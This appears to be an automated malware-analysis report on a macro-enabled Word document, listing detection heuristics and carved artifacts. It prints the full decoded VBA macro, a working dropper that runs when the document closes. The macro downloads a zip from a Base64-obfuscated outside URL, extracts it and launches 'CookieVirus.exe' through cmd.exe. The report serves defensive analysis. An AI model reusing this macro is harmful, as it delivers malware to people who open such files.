Verdict: MALICIOUS
Risk Score: 262
Heuristics (7)

- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `Set oShell = CreateObject("WScript.Shell")`
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set BinaryStream = CreateObject("ADODB.Stream")`
- cmd.exe reference in VBA (high, OLE_VBA_CMD): cmd.exe reference in VBA. Matched line in script: `oShell.Run "cmd.exe /R /min cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://Motobit.cz (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
  - http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
  - http://ns.adobe.com/xap/1.0/ (referenced by macro)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (referenced by macro)
  - http://ns.adobe.com/xap/1.0/mm/ (referenced by macro)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (referenced by macro)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (referenced by macro)
  - http://ns.adobe.com/photoshop/1.0/ (referenced by macro)
  - http://purl.org/dc/elements/1.1/ (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4468 bytes | 29c3803c55b4692f04e50696059b36a83028404a60769f1008d2cb4403341a34 |
Preview script (macros.bas): first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"

Private Sub CommandButton1_Click()
    abcRun
End Sub

Function SaveBinaryData(FileName, Data)
    ' adTypeText for binary = 1
    Const adTypeText = 1
    Const adSaveCreateOverWrite = 2
    ' Create Stream object
    Dim BinaryStream
    Set BinaryStream = CreateObject("ADODB.Stream")
    ' Specify stream type - we want To save Data/string data.
    BinaryStream.Type = adTypeText
    ' Open the stream And write binary data To the object
    BinaryStream.Open
    BinaryStream.Write Data
    ' Save binary data To disk
    BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
End Function

Function abcRun()
    Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
    Set oShell = CreateObject("WScript.Shell")
    User = oShell.ExpandEnvironmentStrings("%USERNAME%")
    URL = Base64Decode("aHR0cHM6Ly9raXRodWF0cGhhbm1lbS4wMDB3ZWJob3N0YXBwLmNvbS9jaGFyZS90ZXN0LnppcA==")
    Dim FSO
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If FSO.FileExists(Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")) = False Then
        objWinHttp.Open "GET", URL, False
        objWinHttp.send ""
        SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody
        ZipFile = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")
        ExtractTo = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1xUZXN0XA==")
        If Not FSO.FolderExists(ExtractTo) Then
            FSO.CreateFolder (ExtractTo)
        End If
        Set objShell = CreateObject("Shell.Application")
        Set FilesInZip = objShell.NameSpace(ZipFile).items
        objShell.NameSpace(ExtractTo).CopyHere (FilesInZip)
    End If
    Set FSO = Nothing
    Set objShell = Nothing
    oShell.Run "cmd.exe /R /min cd C:\Users\" & User & "\Documents\Test\netcoreapp3.1 && CookieVirus.exe"
End Function

Private Sub Document_Close()
    abcRun
End Sub

Function Base64Decode(ByVal base64String)
    'rfc1521
    '1999 Antonin Foller, Motobit Software, http://Motobit.cz
    Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    Dim dataLength, sOut, groupBegin
    'remove white spaces, If any
    base64String = Replace(base64String, vbCrLf, "")
    base64String = Replace(base64String, vbTab, "")
    base64String = Replace(base64String, " ", "")
    'The source must consists from groups with Len of 4 chars
    dataLength = Len(base64String)
    If dataLength Mod 4 <> 0 Then
        Err.Raise 1, "Base64Decode", "Bad Base64 string."
        Exit Function
    End If
    ' Now decode each group:
    For groupBegin = 1 To dataLength Step 4
        Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
        ' Each data group encodes up To 3 actual bytes.
        numDataBytes = 3
        nGroup = 0
        For CharCounter = 0 To 3
            ' Convert each character into 6 bits of data, And add it To
            ' an integer For temporary storage. If a character is a '=', there
            ' is one fewer data byte. (There can only be a maximum of 2 '=' In
            ' the whole string.)
            thisChar = Mid(base64String, groupBegin + CharCounter, 1)
            If thisChar = "=" Then
                numDataBytes = numDataBytes - 1
                thisData = 0
            Else
                thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
            End If
            If thisData = -1 Then
                Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
                Exit Function
            End If
            nGroup = 64 * nGroup + thisData
        Next
        'Hex splits the long To 6 groups with 4 bits
        nGroup = Hex(nGroup)
        'Add leading zeros
        nGroup = String(6 - Len(nGroup), "0") & nGroup
        'Convert the 3 byte hex integer (6 chars) To 3 characters
        pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
               Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
               Chr(CByte("&H" & Mid(nGroup, 5, 2)))
        'add numDataBytes characters To out string
        sOut = sOut & Left(pOut, numDataBytes)
    Next
    Base64Decode = sOut
End Function
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 19968 bytes | 9b774ca96ebd5cd71671f45583f8358b7ab217bcc447fa02ce94b4e4bb9700f0 |